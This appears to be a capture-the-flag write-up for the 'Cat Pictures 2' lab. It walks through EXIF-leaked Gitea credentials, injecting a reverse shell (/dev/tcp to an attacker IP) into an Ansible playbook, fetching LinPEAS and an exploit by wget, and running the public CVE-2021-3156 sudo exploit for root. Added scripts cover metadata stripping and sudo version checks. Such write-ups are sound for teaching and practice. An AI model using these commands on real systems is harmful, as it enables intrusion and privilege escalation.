Cat Pictures 2

1. Reconnaissance & Enumeration

1.1 Initial Port Scan

export TARGET_IP=10.10.130.75
nmap -p- --min-rate 5000 $TARGET_IP

Results:

Not shown: 65292 closed tcp ports (reset), 237 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
222/tcp  open  rsh-spx
1337/tcp open  waste
3000/tcp open  ppp
8080/tcp open  http-proxy

1.2 Website Enumeration & Metadata Extraction

Browsing to http://10.10.130.75 reveals a website displaying cat pictures. Examining the first image description we notice a comment: "note to self: strip metadata." This strongly suggests hidden information in the image EXIF data.

We download a specific image and use exiftool to extract its metadata:

wget http://10.10.130.75/uploads/medium/f5054e97620f168c7b5088c85ab1d6e4.jpg
exiftool f5054e97620f168c7b5088c85ab1d6e4.jpg

Key Finding:

The Title field in the EXIF data contains: :8080/764efa883dda1e11db47671c4a3bbd9e.txt. This is a strong indicator of a hidden file on port 8080.
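The site owner's own note ("strip metadata") is the fix. As an added example that is not part of the original writeup, the script below walks a JPEG's marker segments, reports every APP1 (Exif/XMP) and COM segment it finds, and returns a copy with those segments removed, which is what a publishing pipeline should do before an image reaches the web root. It runs on a small constructed JPEG skeleton rather than the room's image; the function names are mine.

```python
# APP1..APP15 (0xFFE1..0xFFEF) carry Exif/XMP/ICC, COM (0xFFFE) free-text comments; APP0 (JFIF) is kept.
METADATA_MARKERS = set(range(0xE1, 0xF0)) | {0xFE}

def iter_segments(data):
    """Yield (marker, raw_segment); SOS is yielded with all that follows (scan data has no length)."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xDA:  # SOS: stop header parsing, the scan runs until EOI
            yield marker, data[pos:]
            return
        length = int.from_bytes(data[pos + 2:pos + 4], "big")  # includes the 2 length bytes
        yield marker, data[pos:pos + 2 + length]
        pos += 2 + length
    raise ValueError("truncated JPEG: no SOS segment found")

def find_metadata(data):
    """Return [(segment_name, payload)] for every metadata-bearing segment."""
    found = []
    for marker, seg in iter_segments(data):
        if marker in METADATA_MARKERS:
            name = "COM" if marker == 0xFE else f"APP{marker - 0xE0}"
            found.append((name, seg[4:]))  # skip the 2-byte marker and 2-byte length
    return found

def strip_metadata(data):
    """Return a copy of the JPEG with all APP1..APP15 and COM segments removed."""
    out = bytearray(b"\xff\xd8")
    for marker, seg in iter_segments(data):
        if marker not in METADATA_MARKERS:
            out += seg
    return bytes(out)

def _segment(marker, payload):
    return b"\xff" + bytes([marker]) + (len(payload) + 2).to_bytes(2, "big") + payload

# Constructed sample: JFIF APP0, an Exif APP1 (placeholder payload standing in for the TIFF
# structure that holds tags such as Title) and a COM segment, then a minimal SOS and EOI.
SAMPLE_JPEG = (
    b"\xff\xd8"
    + _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    + _segment(0xE1, b"Exif\x00\x00<tiff data carrying the Title tag would go here>")
    + _segment(0xFE, b"note to self: strip metadata")
    + b"\xff\xda\x00\x03\x00"  # SOS header only; no real scan data in this sample
    + b"\xff\xd9"
)
```

On a real upload, `find_metadata(open(path, "rb").read())` lists what would leak and `strip_metadata` produces the bytes to store; a full Exif parser would additionally decode the TIFF payload to show the Title value itself.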

1.3 Hidden File Retrieval

We access the revealed URL: http://10.10.130.75:8080/764efa883dda1e11db47671c4a3bbd9e.txt.

Contents:

I setup an internal gitea instance to start using IaC for this server. It's at a quite basic state, but I'm putting the password here because I will definitely forget.
This file isn't easy to find anyway unless you have the correct url...

gitea: port 3000
user: samarium
password: TUmhyZ37CLZrhP

ansible runner (olivetin): port 1337

Analysis:

  • Gitea Instance: A self-hosted Git service (similar to GitHub) is running on port 3000. We have credentials!
  • Ansible Runner: An Ansible automation tool is accessible on port 1337.
  • User: samarium Password: TUmhyZ37CLZrhP

2. Exploitation

2.1 Gitea Access & Flag 1

Using the discovered credentials, we log in to the Gitea instance at http://10.10.130.75:3000 and find flag1.txt in the samarium/ansible repository.

  • Flag 1 Location: http://10.10.130.75:3000/samarium/ansible/src/branch/main/flag1.txt

2.2 Ansible Playbook Manipulation & Reverse Shell

The Gitea repository contains an Ansible playbook (playbook.yaml), and the Ansible runner on port 1337 executes whatever that repository holds, as the bismuth user. Anyone with write access to the repository therefore controls what runs on the host: a classic code injection opportunity.

Modified Playbook (Reverse Shell Injection):

playbook.yaml
---
- name: Test
  hosts: all # Define all the hosts
  remote_user: bismuth
  # Defining the Ansible task
  tasks:
    - name: get the username running the deploy
      become: false
      command: bash -c "sh -i >& /dev/tcp/10.2.17.44/6666 0>&1"
      register: username_on_the_host
      changed_when: false

    - debug: var=username_on_the_host

    - name: Test
      shell: echo hi

Steps:

  1. Modify playbook.yaml: Update the playbook in the Gitea repository with the reverse shell code.
  2. Start Listener: On your attacking machine, start a Netcat listener: nc -lvnp 6666
  3. Trigger Playbook: Navigate to http://10.10.130.75:1337/ and click the "Run Ansible Playbook" button.
  4. Receive Shell: Your Netcat listener should receive a connection, giving you a shell as the bismuth user.

# Attacker Machine
nc -lvnp 6666

# (After triggering the playbook)
# Connection received!
id # uid=1000(bismuth) gid=1000(bismuth) groups=1000(bismuth),4(adm),24(cdrom),30(dip),46(plugdev),115(lpadmin),116(sambashare)

3. Privilege Escalation

3.1 Local Enumeration with LinPEAS

To identify potential privilege escalation paths, we'll use LinPEAS, a comprehensive enumeration script.

Steps:

  1. Download LinPEAS: Obtain linpeas.sh from the official PEASS-ng repository: https://github.com/carlospolop/PEASS-ng/releases
  2. Transfer to Target:
    • Attacker Machine: Start a simple HTTP server: python3 -m http.server 80
    • Target Machine (bismuth shell): Download LinPEAS: wget http://10.2.17.44/linpeas.sh
    • Target Machine: Make it executable: chmod +x linpeas.sh
  3. Run LinPEAS: Execute the script: ./linpeas.sh

3.2 Identifying the Vulnerability

LinPEAS output highlights the installed sudo version, Sudo version 1.8.21p2, which falls in the range affected by CVE-2021-3156 (Baron Samedit, a heap-based buffer overflow in sudo).
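The same check can be made on any host without running LinPEAS. As an added example that is not part of the original writeup, the script below parses a sudo version string such as the line LinPEAS printed and compares it against the upstream ranges the CVE-2021-3156 advisory lists; parse_version, is_affected and check_installed_sudo are names I chose. The caveat a practitioner wants is in the is_affected docstring: distributions backport fixes without bumping the upstream version string, so a hit is a prompt to check the package changelog, not a verdict.

```python
import re
import subprocess

# Upstream ranges affected by CVE-2021-3156 (from the advisory): legacy 1.8.2 to
# 1.8.31p2 and stable 1.9.0 to 1.9.5p1; the fix shipped in 1.9.5p2.
AFFECTED_RANGES = [("1.8.2", "1.8.31p2"), ("1.9.0", "1.9.5p1")]

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")

def parse_version(text):
    """Turn '1.8.21p2' (or the whole 'Sudo version 1.8.21p2' line) into a comparable
    tuple. A missing patch level counts as p0, so 1.9.5 < 1.9.5p1 < 1.9.5p2."""
    m = _VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no sudo version found in {text!r}")
    major, minor, release, patch = m.groups()
    return (int(major), int(minor), int(release), int(patch or 0))

def is_affected(version_text):
    """True if the upstream version string falls inside an affected range.
    Caveat: distributions backport fixes without changing this string (Ubuntu's
    patched 1.8.21p2 packages, for instance), so confirm a hit against the vendor
    advisory or package changelog before calling the host vulnerable."""
    v = parse_version(version_text)
    return any(parse_version(lo) <= v <= parse_version(hi) for lo, hi in AFFECTED_RANGES)

def check_installed_sudo():
    """Run 'sudo --version' (no privileges needed) and return (version_line, affected)."""
    out = subprocess.run(["sudo", "--version"], capture_output=True, text=True, check=True)
    first_line = out.stdout.splitlines()[0]  # e.g. 'Sudo version 1.8.21p2'
    return first_line, is_affected(first_line)

# Constructed sample: the line LinPEAS printed for this host.
LINPEAS_LINE = "Sudo version 1.8.21p2"

if __name__ == "__main__":
    print(LINPEAS_LINE, "->", "affected" if is_affected(LINPEAS_LINE) else "not affected")
    try:
        line, hit = check_installed_sudo()
        print(line, "->", "affected" if hit else "not affected")
    except (FileNotFoundError, subprocess.CalledProcessError) as exc:
        print("could not query local sudo:", exc)
```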

3.3 Exploiting CVE-2021-3156

We'll use a publicly available exploit for CVE-2021-3156.

Steps:

  1. Obtain Exploit: Clone the exploit repository from GitHub:
    Attacker Machine
    git clone https://github.com/blasty/CVE-2021-3156
  2. Prepare for Transfer: Create a tar archive for easier transfer:
    Attacker Machine
    tar -cvf exploit.tar CVE-2021-3156
    python3 -m http.server 80 # If not already running
  3. Transfer and Extract:
    Target Machine
    cd /tmp  # Good practice to work in /tmp for exploits
    wget http://10.2.17.44/exploit.tar
    tar xopf exploit.tar
    cd CVE-2021-3156
  4. Compile and Run:
    Target Machine
    make
    ./sudo-hax-me-a-sandwich 0 # Run with target 0 (check available targets with ./sudo-hax-me-a-sandwich)

3.4 Root Shell and Flag 3

If the exploit is successful, you should obtain a root shell.

id  # uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),115(lpadmin),116(sambashare),1000(bismuth)
cat /root/flag3.txt # Retrieve the final flag